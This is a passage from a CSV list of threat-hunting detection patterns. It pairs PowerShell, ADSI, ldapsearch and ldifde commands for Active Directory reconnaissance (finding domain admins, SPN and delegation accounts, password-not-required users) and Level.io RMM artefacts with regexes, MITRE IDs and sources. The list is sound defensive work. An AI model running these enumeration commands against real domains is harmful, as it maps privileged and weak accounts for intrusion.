"*([adsisearcher]'(&(objectCategory=computer)(!(primaryGroupID=516)(userAccountControl:1.2.840.113556.1.4.803:=524288)))').FindAll()*",".{0,1000}\(\[adsisearcher\]\'\(\&\(objectCategory\=computer\)\(!\(primaryGroupID\=516\)\(userAccountControl\:1\.2\.840\.113556\.1\.4\.803\:\=524288\)\)\)\'\)\.FindAll\(\).{0,1000}","greyware_tool_keyword","ldap queries","Enumerate all servers configured for Unconstrained Delegation","T1087 - T1087.002 - T1018 - T1069 - T1069.002 - T1069.003 - T1133 - T1139","TA0007 - TA0009","N/A","N/A","Discovery","N/A","1","0","N/A","N/A","9","10","N/A","N/A","N/A","N/A" 
"*([adsisearcher]'(&(objectCategory=computer)(userAccountControl:1.2.840.113556.1.4.803:=8192))').FindAll()*",".{0,1000}\(\[adsisearcher\]\'\(\&\(objectCategory\=computer\)\(userAccountControl\:1\.2\.840\.113556\.1\.4\.803\:\=8192\)\)\'\)\.FindAll\(\).{0,1000}","greyware_tool_keyword","ldap queries","Enumerate all Domain Controllers","T1087 - T1087.002 - T1018 - T1069 - T1069.002 - T1069.003 - T1133 - T1139","TA0007 - TA0009","N/A","N/A","Discovery","https://web.archive.org/web/20240109000256/https://cyberdom.blog/2024/01/07/defender-for-identity-hunting-for-ldap/","1","0","N/A","N/A","9","10","N/A","N/A","N/A","N/A" "*([adsisearcher]'(&(objectCategory=user)(!(samAccountName=krbtgt)(servicePrincipalName=*)))').FindAll()*",".{0,1000}\(\[adsisearcher\]\'\(\&\(objectCategory\=user\)\(!\(samAccountName\=krbtgt\)\(servicePrincipalName\=.{0,1000}\)\)\)\'\)\.FindAll\(\).{0,1000}","greyware_tool_keyword","ldap queries","Search for user accounts with SPN but not TGT accounts","T1087 - T1087.002 - T1018 - T1069 - T1069.002 - T1069.003 - T1133 - T1139","TA0007 - TA0009","N/A","N/A","Discovery","https://jsecurity101.medium.com/uncovering-adversarial-ldap-tradecraft-658b2deca384","1","0","N/A","N/A","8","10","N/A","N/A","N/A","N/A" "*([adsisearcher]'(adminCount=1)').FindAll()*",".{0,1000}\(\[adsisearcher\]\'\(adminCount\=1\)\'\)\.FindAll\(\).{0,1000}","greyware_tool_keyword","ldap queries","Search for all objects with AdminSDHolder","T1087 - T1087.002 - T1018 - T1069 - T1069.002 - T1069.003 - T1133 - T1139","TA0007 - TA0009","N/A","N/A","Discovery","https://jsecurity101.medium.com/uncovering-adversarial-ldap-tradecraft-658b2deca384","1","0","N/A","N/A","8","10","N/A","N/A","N/A","N/A" "*([DirectoryServices.ActiveDirectory.Forest]::GetCurrentForest()).Domains*",".{0,1000}\(\[DirectoryServices\.ActiveDirectory\.Forest\]\:\:GetCurrentForest\(\)\)\.Domains.{0,1000}","greyware_tool_keyword","ldap queries","Queries for domain level and mode information","T1087 - T1087.002 - T1018 - 
T1069 - T1069.002 - T1069.003 - T1133 - T1139","TA0007 - TA0009","N/A","N/A","Discovery","https://github.com/swarleysez/AD-common-queries","1","0","N/A","N/A","8","1","5","3","2020-05-24T03:23:09Z","2020-03-10T19:43:51Z" "*([DirectoryServices.ActiveDirectory.Forest]::GetCurrentForest()).Sites | *",".{0,1000}\(\[DirectoryServices\.ActiveDirectory\.Forest\]\:\:GetCurrentForest\(\)\)\.Sites\s\|\s.{0,1000}","greyware_tool_keyword","ldap queries","enumeration of AD Forest Sites","T1087 - T1087.002 - T1018 - T1069 - T1069.002 - T1069.003 - T1133 - T1139","TA0007 - TA0009","N/A","N/A","Discovery","https://github.com/swarleysez/AD-common-queries","1","0","N/A","N/A","8","1","5","3","2020-05-24T03:23:09Z","2020-03-10T19:43:51Z" "*([System.DirectoryServices.ActiveDirectory.Domain]::GetCurrentDomain()).FindAllDomainControllers() | Select-Object -Property *",".{0,1000}\(\[System\.DirectoryServices\.ActiveDirectory\.Domain\]\:\:GetCurrentDomain\(\)\)\.FindAllDomainControllers\(\)\s\|\sSelect\-Object\s\-Property\s.{0,1000}","greyware_tool_keyword","ldap queries","querying all domain controllers with detailed properties","T1087 - T1087.002 - T1018 - T1069 - T1069.002 - T1069.003 - T1133 - T1139","TA0007 - TA0009","N/A","N/A","Discovery","https://github.com/swarleysez/AD-common-queries","1","0","N/A","N/A","8","1","5","3","2020-05-24T03:23:09Z","2020-03-10T19:43:51Z" "*([System.DirectoryServices.ActiveDirectory.Domain]::GetCurrentDomain()).GetAllTrustRelationships()*",".{0,1000}\(\[System\.DirectoryServices\.ActiveDirectory\.Domain\]\:\:GetCurrentDomain\(\)\)\.GetAllTrustRelationships\(\).{0,1000}","greyware_tool_keyword","ldap queries","get all trust relationships in the current domain","T1087 - T1087.002 - T1018 - T1069 - T1069.002 - T1069.003 - T1133 - T1139","TA0007 - TA0009","N/A","N/A","Discovery","https://github.com/swarleysez/AD-common-queries","1","0","N/A","N/A","8","1","5","3","2020-05-24T03:23:09Z","2020-03-10T19:43:51Z" "*(Get-ADForest).Domains | %{ 
Get-ADDomainController -Filter * -Server $_ }*",".{0,1000}\(Get\-ADForest\)\.Domains\s\|\s\%\{\sGet\-ADDomainController\s\-Filter\s.{0,1000}\s\-Server\s\$_\s\}.{0,1000}","greyware_tool_keyword","ldap queries","Enumerate all of the domain controllers for all domains in a forest","T1087 - T1087.002 - T1018 - T1069 - T1069.002 - T1069.003 - T1133 - T1139","TA0007 - TA0009","N/A","N/A","Discovery","N/A","1","0","N/A","N/A","6","6","N/A","N/A","N/A","N/A" "*(msds-supportedencryptiontypes=0)(msds-supportedencryptiontypes:1.2.840.113556.1.4.803:=4)))*",".{0,1000}\(msds\-supportedencryptiontypes\=0\)\(msds\-supportedencryptiontypes\:1\.2\.840\.113556\.1\.4\.803\:\=4\)\)\).{0,1000}","greyware_tool_keyword","ldap queries","used by Rubeus and S4UTomato tools","T1087 - T1087.002 - T1018 - T1069 - T1069.002 - T1069.003 - T1133 - T1139","TA0007 - TA0009","N/A","N/A","Discovery","N/A","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A" "*(objectCategory=person)(objectClass=user)(serviceAccount=TRUE)*",".{0,1000}\(objectCategory\=person\)\(objectClass\=user\)\(serviceAccount\=TRUE\).{0,1000}","greyware_tool_keyword","ldap queries","Query to find service accounts which are typically high-privileged and targeted for privilege escalation","T1087 - T1087.002 - T1018 - T1069 - T1069.002 - T1069.003 - T1133 - T1139","TA0007 - TA0009","N/A","N/A","Discovery","https://github.com/mthcht/ThreatHunting-Keywords","1","0","N/A","N/A","8","5","425","51","2024-08-24T11:38:32Z","2023-05-16T15:38:26Z" "*(objectclass=group)(samaccountname=domain admins)*",".{0,1000}\(objectclass\=group\)\(samaccountname\=domain\sadmins\).{0,1000}","greyware_tool_keyword","ldap queries","Enumerate Domain Admins","T1087 - T1087.002 - T1018 - T1069 - T1069.002 - T1069.003 - T1133 - T1139","TA0007 - TA0009","N/A","N/A","Discovery","https://gist.github.com/jsecurity101/9c7e94f95b8d90f9252d64949562ba5d","1","0","N/A","N/A","8","10","N/A","N/A","N/A","N/A" 
"*(userAccountControl:1.2.840.113556.1.4.803:=524288)*",".{0,1000}\(userAccountControl\:1\.2\.840\.113556\.1\.4\.803\:\=524288\).{0,1000}","greyware_tool_keyword","ldap queries","Accounts Trusted for Delegation","T1087 - T1087.002 - T1018 - T1069 - T1069.002 - T1069.003 - T1133 - T1139","TA0007 - TA0009","N/A","N/A","Discovery","https://gist.github.com/jsecurity101/9c7e94f95b8d90f9252d64949562ba5d","1","0","N/A","N/A","8","10","N/A","N/A","N/A","N/A" "*[ADSI]* | Select-Object -Property *lockoutDuration*",".{0,1000}\[ADSI\].{0,1000}\s\|\sSelect\-Object\s\-Property\s.{0,1000}lockoutDuration.{0,1000}","greyware_tool_keyword","ldap queries","enumeration of Domain Password Policies","T1087 - T1087.002 - T1018 - T1069 - T1069.002 - T1069.003 - T1133 - T1139","TA0007 - TA0009","N/A","N/A","Discovery","https://github.com/swarleysez/AD-common-queries","1","0","N/A","N/A","8","1","5","3","2020-05-24T03:23:09Z","2020-03-10T19:43:51Z" "*[ADSI]* | Select-Object -Property *lockoutThreshold*",".{0,1000}\[ADSI\].{0,1000}\s\|\sSelect\-Object\s\-Property\s.{0,1000}lockoutThreshold.{0,1000}","greyware_tool_keyword","ldap queries","enumeration of Domain Password Policies","T1087 - T1087.002 - T1018 - T1069 - T1069.002 - T1069.003 - T1133 - T1139","TA0007 - TA0009","N/A","N/A","Discovery","https://github.com/swarleysez/AD-common-queries","1","0","N/A","N/A","8","1","5","3","2020-05-24T03:23:09Z","2020-03-10T19:43:51Z" "*[ADSI]* | Select-Object -Property *minPwdLength*",".{0,1000}\[ADSI\].{0,1000}\s\|\sSelect\-Object\s\-Property\s.{0,1000}minPwdLength.{0,1000}","greyware_tool_keyword","ldap queries","enumeration of Domain Password Policies","T1087 - T1087.002 - T1018 - T1069 - T1069.002 - T1069.003 - T1133 - T1139","TA0007 - TA0009","N/A","N/A","Discovery","https://github.com/swarleysez/AD-common-queries","1","0","N/A","N/A","8","1","5","3","2020-05-24T03:23:09Z","2020-03-10T19:43:51Z" "*[ADSI]*LDAP://CN=Domain Admins*| ForEach-Object {[adsi]""LDAP://$_""}; 
*.distinguishedname*",".{0,1000}\[ADSI\].{0,1000}LDAP\:\/\/CN\=Domain\sAdmins.{0,1000}\|\sForEach\-Object\s\{\[adsi\]\""LDAP\:\/\/\$_\""\}\;\s.{0,1000}\.distinguishedname.{0,1000}","greyware_tool_keyword","ldap queries","enumeration of Domain Admins group members","T1087 - T1087.002 - T1018 - T1069 - T1069.002 - T1069.003 - T1133 - T1139","TA0007 - TA0009","N/A","N/A","Discovery","https://github.com/swarleysez/AD-common-queries","1","0","N/A","N/A","8","1","5","3","2020-05-24T03:23:09Z","2020-03-10T19:43:51Z" "*[ADSI]*LDAP://dc=* | Select -Property pwdProperties*",".{0,1000}\[ADSI\].{0,1000}LDAP\:\/\/dc\=.{0,1000}\s\|\sSelect\s\-Property\spwdProperties.{0,1000}","greyware_tool_keyword","ldap queries","get LDAP properties for password settings directly","T1087 - T1087.002 - T1018 - T1069 - T1069.002 - T1069.003 - T1133 - T1139","TA0007 - TA0009","N/A","N/A","Discovery","https://github.com/swarleysez/AD-common-queries","1","0","N/A","N/A","8","1","5","3","2020-05-24T03:23:09Z","2020-03-10T19:43:51Z" "*[adsisearcher]""(&(objectCategory=person)(objectClass=user)(!(userAccountControl:1.2.840.113556.1.4.803:=2)))""; $users = $searchUsers.FindAll(); $userProps = $users.Properties; $userProps | Where-Object {$_.description}*",".{0,1000}\[adsisearcher\]\""\(\&\(objectCategory\=person\)\(objectClass\=user\)\(!\(userAccountControl\:1\.2\.840\.113556\.1\.4\.803\:\=2\)\)\)\""\;\s\$users\s\=\s\$searchUsers\.FindAll\(\)\;\s\$userProps\s\=\s\$users\.Properties\;\s\$userProps\s\|\sWhere\-Object\s\{\$_\.description\}.{0,1000}","greyware_tool_keyword","ldap queries","find user descriptions in Active Directory:","T1087 - T1087.002 - T1018 - T1069 - T1069.002 - T1069.003 - T1133 - T1139","TA0007 - TA0009","N/A","N/A","Discovery","https://github.com/swarleysez/AD-common-queries","1","0","N/A","N/A","8","1","5","3","2020-05-24T03:23:09Z","2020-03-10T19:43:51Z" 
"*[adsisearcher]""(&(objectCategory=person)(objectClass=user)(userAccountControl:1.2.840.113556.1.4.803:=2))""*",".{0,1000}\[adsisearcher\]\""\(\&\(objectCategory\=person\)\(objectClass\=user\)\(userAccountControl\:1\.2\.840\.113556\.1\.4\.803\:\=2\)\)\"".{0,1000}","greyware_tool_keyword","ldap queries","find all disabled user accounts","T1087 - T1087.002 - T1018 - T1069 - T1069.002 - T1069.003 - T1133 - T1139","TA0007 - TA0009","N/A","N/A","Discovery","https://github.com/swarleysez/AD-common-queries","1","0","N/A","N/A","8","1","5","3","2020-05-24T03:23:09Z","2020-03-10T19:43:51Z" "*[adsisearcher]""(&(objectCategory=person)(objectClass=user)(userAccountControl:1.2.840.113556.1.4.803:=2560)(!(userAccountControl:1.2.840.113556.1.4.803:=2)))""*",".{0,1000}\[adsisearcher\]\""\(\&\(objectCategory\=person\)\(objectClass\=user\)\(userAccountControl\:1\.2\.840\.113556\.1\.4\.803\:\=2560\)\(!\(userAccountControl\:1\.2\.840\.113556\.1\.4\.803\:\=2\)\)\)\"".{0,1000}","greyware_tool_keyword","ldap queries","get a count of all inter domain trust accounts","T1087 - T1087.002 - T1018 - T1069 - T1069.002 - T1069.003 - T1133 - T1139","TA0007 - TA0009","N/A","N/A","Discovery","https://github.com/swarleysez/AD-common-queries","1","0","N/A","N/A","8","1","5","3","2020-05-24T03:23:09Z","2020-03-10T19:43:51Z" "*[adsisearcher]""(&(objectCategory=person)(objectClass=user)(userAccountControl:1.2.840.113556.1.4.803:=32)(!(userAccountControl:1.2.840.113556.1.4.803:=2)))*",".{0,1000}\[adsisearcher\]\""\(\&\(objectCategory\=person\)\(objectClass\=user\)\(userAccountControl\:1\.2\.840\.113556\.1\.4\.803\:\=32\)\(!\(userAccountControl\:1\.2\.840\.113556\.1\.4\.803\:\=2\)\)\).{0,1000}","greyware_tool_keyword","ldap queries","Detection of all accounts with 'Password Not Required'","T1087 - T1087.002 - T1018 - T1069 - T1069.002 - T1069.003 - T1133 - T1139","TA0007 - 
TA0009","N/A","N/A","Discovery","https://github.com/swarleysez/AD-common-queries","1","0","N/A","N/A","8","1","5","3","2020-05-24T03:23:09Z","2020-03-10T19:43:51Z" "*[adsisearcher]'(&(objectCategory=computer)(primaryGroupID=516))').FindAll()*",".{0,1000}\[adsisearcher\]\'\(\&\(objectCategory\=computer\)\(primaryGroupID\=516\)\)\'\)\.FindAll\(\).{0,1000}","greyware_tool_keyword","ldap queries","Enumerate all Domain Controllers","T1087 - T1087.002 - T1018 - T1069 - T1069.002 - T1069.003 - T1133 - T1139","TA0007 - TA0009","N/A","N/A","Discovery","https://web.archive.org/web/20240109000256/https://cyberdom.blog/2024/01/07/defender-for-identity-hunting-for-ldap/","1","0","N/A","N/A","9","10","N/A","N/A","N/A","N/A" "*[adsisearcher]'(&(objectCategory=person)(objectClass=user)(userAccountControl:1.2.840.113556.1.4.803:=32))').FindAll()*",".{0,1000}\[adsisearcher\]\'\(\&\(objectCategory\=person\)\(objectClass\=user\)\(userAccountControl\:1\.2\.840\.113556\.1\.4\.803\:\=32\)\)\'\)\.FindAll\(\).{0,1000}","greyware_tool_keyword","ldap queries","Enumerate all accounts that do not require a password","T1087 - T1087.002 - T1018 - T1069 - T1069.002 - T1069.003 - T1133 - T1139","TA0007 - TA0009","N/A","N/A","Discovery","https://jsecurity101.medium.com/uncovering-adversarial-ldap-tradecraft-658b2deca384","1","0","N/A","N/A","8","10","N/A","N/A","N/A","N/A" "*[adsisearcher]*(&(objectCategory=person)(objectClass=user)(userAccountControl:1.2.840.113556.1.4.803:=66048)(!(userAccountControl:1.2.840.113556.1.4.803:=2))*",".{0,1000}\[adsisearcher\].{0,1000}\(\&\(objectCategory\=person\)\(objectClass\=user\)\(userAccountControl\:1\.2\.840\.113556\.1\.4\.803\:\=66048\)\(!\(userAccountControl\:1\.2\.840\.113556\.1\.4\.803\:\=2\)\).{0,1000}","greyware_tool_keyword","ldap queries","ADSI query to retrieve all active user accounts with non-expiring passwords","T1087 - T1087.002 - T1018 - T1069 - T1069.002 - T1069.003 - T1133 - T1139","TA0007 - 
TA0009","N/A","N/A","Discovery","https://github.com/swarleysez/AD-common-queries","1","0","N/A","N/A","8","1","5","3","2020-05-24T03:23:09Z","2020-03-10T19:43:51Z" "*[System.DirectoryServices.ActiveDirectory.Domain]::GetCurrentDomain().DomainControllers*",".{0,1000}\[System\.DirectoryServices\.ActiveDirectory\.Domain\]\:\:GetCurrentDomain\(\)\.DomainControllers.{0,1000}","greyware_tool_keyword","ldap queries","Discover all Domain Controller in the domain using ADSI","T1087 - T1087.002 - T1018 - T1069 - T1069.002 - T1069.003 - T1133 - T1139","TA0007 - TA0009","N/A","N/A","Discovery","https://adsecurity.org/?p=299","1","0","N/A","N/A","6","10","N/A","N/A","N/A","N/A" "*[System.DirectoryServices.ActiveDirectory.Forest]::GetCurrentForest().GlobalCatalogs*",".{0,1000}\[System\.DirectoryServices\.ActiveDirectory\.Forest\]\:\:GetCurrentForest\(\)\.GlobalCatalogs.{0,1000}","greyware_tool_keyword","ldap queries","Discover all Global Catalogs in the forest using ADSI","T1087 - T1087.002 - T1018 - T1069 - T1069.002 - T1069.003 - T1133 - T1139","TA0007 - TA0009","N/A","N/A","Discovery","https://adsecurity.org/?p=299","1","0","N/A","N/A","6","10","N/A","N/A","N/A","N/A" "*[System.DirectoryServices.ActiveDirectory.Forest]::GetCurrentForest().RootDomain.PDCRoleOwner.Name*",".{0,1000}\[System\.DirectoryServices\.ActiveDirectory\.Forest\]\:\:GetCurrentForest\(\)\.RootDomain\.PDCRoleOwner\.Name.{0,1000}","greyware_tool_keyword","ldap queries","query for the primary domain controller within the forest","T1087 - T1087.002 - T1018 - T1069 - T1069.002 - T1069.003 - T1133 - T1139","TA0007 - TA0009","N/A","N/A","Discovery","https://github.com/swarleysez/AD-common-queries","1","0","N/A","N/A","8","1","5","3","2020-05-24T03:23:09Z","2020-03-10T19:43:51Z" "*get-ADComputer -filter { PrimaryGroupID -eq ""516"" } -properties PrimaryGroupID*",".{0,1000}get\-ADComputer\s\-filter\s\{\sPrimaryGroupID\s\-eq\s\""516\""\s\}\s\-properties\sPrimaryGroupID.{0,1000}","greyware_tool_keyword","ldap 
queries","cmdlets to get computer information about Domain Controllers","T1087 - T1087.002 - T1018 - T1069 - T1069.002 - T1069.003 - T1133 - T1139","TA0007 - TA0009","N/A","N/A","Discovery","https://adsecurity.org/?p=299","1","0","N/A","N/A","6","10","N/A","N/A","N/A","N/A" "*Get-ADUser -filter * -Properties SamAccountName, PasswordNotRequired | where { $_.passwordnotrequired -eq ""true"" } | where {$_.enabled -eq ""true""}*",".{0,1000}Get\-ADUser\s\-filter\s.{0,1000}\s\-Properties\sSamAccountName,\sPasswordNotRequired\s\|\swhere\s\{\s\$_\.passwordnotrequired\s\-eq\s\""true\""\s\}\s\|\swhere\s\{\$_\.enabled\s\-eq\s\""true\""\}.{0,1000}","greyware_tool_keyword","ldap queries","identifying accounts with 'Password Not Required'","T1087 - T1087.002 - T1018 - T1069 - T1069.002 - T1069.003 - T1133 - T1139","TA0007 - TA0009","N/A","N/A","Discovery","https://github.com/swarleysez/AD-common-queries","1","0","N/A","N/A","8","1","5","3","2020-05-24T03:23:09Z","2020-03-10T19:43:51Z" "*Get-ADUser -properties * -filter {(lastlogondate -notlike ""*"" -OR lastlogondate -le $90days) -AND (passwordlastset -le $90days) -AND (enabled -eq $True) -and (PasswordNeverExpires -eq $false) -and (whencreated -le $90days)}*",".{0,1000}Get\-ADUser\s\-properties\s.{0,1000}\s\-filter\s\{\(lastlogondate\s\-notlike\s\"".{0,1000}\""\s\-OR\slastlogondate\s\-le\s\$90days\)\s\-AND\s\(passwordlastset\s\-le\s\$90days\)\s\-AND\s\(enabled\s\-eq\s\$True\)\s\-and\s\(PasswordNeverExpires\s\-eq\s\$false\)\s\-and\s\(whencreated\s\-le\s\$90days\)\}.{0,1000}","greyware_tool_keyword","ldap queries","querying accounts that have not been logged into for over 90 days","T1087 - T1087.002 - T1018 - T1069 - T1069.002 - T1069.003 - T1133 - T1139","TA0007 - TA0009","N/A","N/A","Discovery","https://github.com/swarleysez/AD-common-queries","1","0","N/A","N/A","8","1","5","3","2020-05-24T03:23:09Z","2020-03-10T19:43:51Z" 
"*powershell*[adsisearcher]*(objectcategory=group)*findAll()*",".{0,1000}powershell.{0,1000}\[adsisearcher\].{0,1000}\(objectcategory\=group\).{0,1000}findAll\(\).{0,1000}","greyware_tool_keyword","ldap queries","Red Teams and adversaries may leverage [Adsisearcher] to enumerate domain groups for situational awareness and Active Directory Discovery","T1087 - T1087.002 - T1018 - T1069 - T1069.002 - T1069.003 - T1133 - T1139","TA0007 - TA0009","N/A","N/A","Discovery","https://research.splunk.com/endpoint/089c862f-5f83-49b5-b1c8-7e4ff66560c7/","1","0","N/A","N/A","8","10","N/A","N/A","N/A","N/A" "*ldapsearch * ldap://*",".{0,1000}ldapsearch\s.{0,1000}\sldap\:\/\/.{0,1000}","greyware_tool_keyword","ldapsearch","ldapsearch to enumerate ldap","T1018 - T1087 - T1069","TA0007 - TA0002 - TA0008","N/A","N/A","Reconnaissance","https://man7.org/linux/man-pages/man1/ldapsearch.1.html","1","0","N/A","greyware tool - risks of False positive !","6","10","N/A","N/A","N/A","N/A" "*ldapsearch -x -h * -s base*",".{0,1000}ldapsearch\s\-x\s\-h\s.{0,1000}\s\-s\sbase.{0,1000}","greyware_tool_keyword","ldapsearch","ldapsearch to enumerate ldap","T1018 - T1087 - T1069","TA0007 - TA0002 - TA0008","N/A","N/A","Reconnaissance","https://man7.org/linux/man-pages/man1/ldapsearch.1.html","1","0","N/A","greyware tool - risks of False positive !","6","10","N/A","N/A","N/A","N/A" "ldapsearch -h * -x*","ldapsearch\s\-h\s.{0,1000}\s\-x.{0,1000}","greyware_tool_keyword","ldapsearch","ldapsearch to enumerate ldap","T1018 - T1087 - T1069","TA0007 - TA0002 - TA0008","N/A","N/A","Reconnaissance","https://man7.org/linux/man-pages/man1/ldapsearch.1.html","1","0","N/A","greyware tool - risks of False positive !","6","10","N/A","N/A","N/A","N/A" "*ldifde.exe -f *\temp\*.txt -p subtree*",".{0,1000}ldifde\.exe\s\-f\s.{0,1000}\\temp\\.{0,1000}\.txt\s\-p\ssubtree.{0,1000}","greyware_tool_keyword","ldifde","using ldifde.exe to export data from Active Directory to a .txt file in the Temp directory","T1018 - T1005 - 
T1077.001","TA0007 - TA0005 - TA0002","N/A","Volt Typhoon","Reconnaissance","https://media.defense.gov/2023/May/24/2003229517/-1/-1/0/CSA_Living_off_the_Land.PDF","1","0","N/A","greyware_tools high risks of false positives","5","5","N/A","N/A","N/A","N/A" "*aigmfoeogfnljhnofglledbhhfegannp*",".{0,1000}aigmfoeogfnljhnofglledbhhfegannp.{0,1000}","greyware_tool_keyword","Lethean Proxy VPN","External VPN usage within corporate network","T1090.003 - T1133 - T1572","TA0003 - TA0001 - TA0011 - TA0010 - TA0005","N/A","N/A","Data Exfiltration","https://raw.githubusercontent.com/SigmaHQ/sigma/43277f26fc1c81fc98fc79147b711189e901b757/rules/windows/registry/registry_set/registry_set_chrome_extension.yml","1","0","N/A","detection in registry","8","10","N/A","N/A","N/A","N/A" "* ./level-darwin-bundle-amd64.pkg*",".{0,1000}\s\.\/level\-darwin\-bundle\-amd64\.pkg.{0,1000}","greyware_tool_keyword","level.io","Level is reinventing remote monitoring and management","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered Spider*","RMM","https://level.io/","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A" "* ./level-linux-amd64 *",".{0,1000}\s\.\/level\-linux\-amd64\s.{0,1000}","greyware_tool_keyword","level.io","Level is reinventing remote monitoring and management","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered Spider*","RMM","https://level.io/","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A" "* ./level-linux-arm64 *",".{0,1000}\s\.\/level\-linux\-arm64\s.{0,1000}","greyware_tool_keyword","level.io","Level is reinventing remote monitoring and management","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered Spider*","RMM","https://level.io/","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A" "* /F /TN ""Level\Level Watchdog""*",".{0,1000}\s\/F\s\/TN\s\""Level\\Level\sWatchdog\"".{0,1000}","greyware_tool_keyword","level.io","Level is reinventing remote monitoring and management","T1021 - T1071 - T1090","TA0003 - TA0008 - 
TA0011","N/A","Scattered Spider*","RMM","https://level.io/","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A" "* downloads.level.io*",".{0,1000}\sdownloads\.level\.io.{0,1000}","greyware_tool_keyword","level.io","Level is reinventing remote monitoring and management","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered Spider*","RMM","https://level.io/","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A" "*""message"":""ably connection state: CONNECTED""}*",".{0,1000}\""message\""\:\""ably\sconnection\sstate\:\sCONNECTED\""\}.{0,1000}","greyware_tool_keyword","level.io","Level is reinventing remote monitoring and management","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered Spider*","RMM","https://level.io/","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A" "*$env:LEVEL_API_KEY = ""*"";*",".{0,1000}\$env\:LEVEL_API_KEY\s\=\s\"".{0,1000}\""\;.{0,1000}","greyware_tool_keyword","level.io","Level is reinventing remote monitoring and management","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered Spider*","RMM","https://level.io/","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A" "*$tempFile = Join-Path ([System.IO.Path]::GetTempPath()) ""install_windows.exe"";*",".{0,1000}\$tempFile\s\=\sJoin\-Path\s\(\[System\.IO\.Path\]\:\:GetTempPath\(\)\)\s\""install_windows\.exe\""\;.{0,1000}","greyware_tool_keyword","level.io","Level is reinventing remote monitoring and management","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered Spider*","RMM","https://level.io/","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A" "*/etc/level/config.yaml*",".{0,1000}\/etc\/level\/config\.yaml.{0,1000}","greyware_tool_keyword","level.io","Level is reinventing remote monitoring and management","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered Spider*","RMM","https://level.io/","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A" 
"*/level-windows-amd64.exe*",".{0,1000}\/level\-windows\-amd64\.exe.{0,1000}","greyware_tool_keyword","level.io","Level is reinventing remote monitoring and management","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered Spider*","RMM","https://level.io/","1","1","N/A","N/A","10","10","N/A","N/A","N/A","N/A" "*/level-windows-arm64.exe*",".{0,1000}\/level\-windows\-arm64\.exe.{0,1000}","greyware_tool_keyword","level.io","Level is reinventing remote monitoring and management","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered Spider*","RMM","https://level.io/","1","1","N/A","N/A","10","10","N/A","N/A","N/A","N/A" "*/usr/local/bin/level*",".{0,1000}\/usr\/local\/bin\/level.{0,1000}","greyware_tool_keyword","level.io","Level is reinventing remote monitoring and management","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered Spider*","RMM","https://level.io/","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A" "*/var/lib/level/level.db*",".{0,1000}\/var\/lib\/level\/level\.db.{0,1000}","greyware_tool_keyword","level.io","Level is reinventing remote monitoring and management","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered Spider*","RMM","https://level.io/","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A" "*/var/lib/level/level.log*",".{0,1000}\/var\/lib\/level\/level\.log.{0,1000}","greyware_tool_keyword","level.io","Level is reinventing remote monitoring and management","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered Spider*","RMM","https://level.io/","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A" "*\level.exe*--check-service*",".{0,1000}\\level\.exe.{0,1000}\-\-check\-service.{0,1000}","greyware_tool_keyword","level.io","Level is reinventing remote monitoring and management","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered Spider*","RMM","https://level.io/","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A" 
"*\level-remote-control-ffmpeg.exe.download*",".{0,1000}\\level\-remote\-control\-ffmpeg\.exe\.download.{0,1000}","greyware_tool_keyword","level.io","Level is reinventing remote monitoring and management","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered Spider*","RMM","https://level.io/","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A" "*\level-windows-amd64.exe*",".{0,1000}\\level\-windows\-amd64\.exe.{0,1000}","greyware_tool_keyword","level.io","Level is reinventing remote monitoring and management","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered Spider*","RMM","https://level.io/","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A" "*\level-windows-arm64.exe*",".{0,1000}\\level\-windows\-arm64\.exe.{0,1000}","greyware_tool_keyword","level.io","Level is reinventing remote monitoring and management","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered Spider*","RMM","https://level.io/","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A" "*\Program Files (x86)\Level\*",".{0,1000}\\Program\sFiles\s\(x86\)\\Level\\.{0,1000}","greyware_tool_keyword","level.io","Level is reinventing remote monitoring and management","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered Spider*","RMM","https://level.io/","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A" "*\Program Files\Level\level.db*",".{0,1000}\\Program\sFiles\\Level\\level\.db.{0,1000}","greyware_tool_keyword","level.io","Level is reinventing remote monitoring and management","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered Spider*","RMM","https://level.io/","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A" "*\Program Files\Level\osqueryi.exe*",".{0,1000}\\Program\sFiles\\Level\\osqueryi\.exe.{0,1000}","greyware_tool_keyword","level.io","Level is reinventing remote monitoring and management","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered 
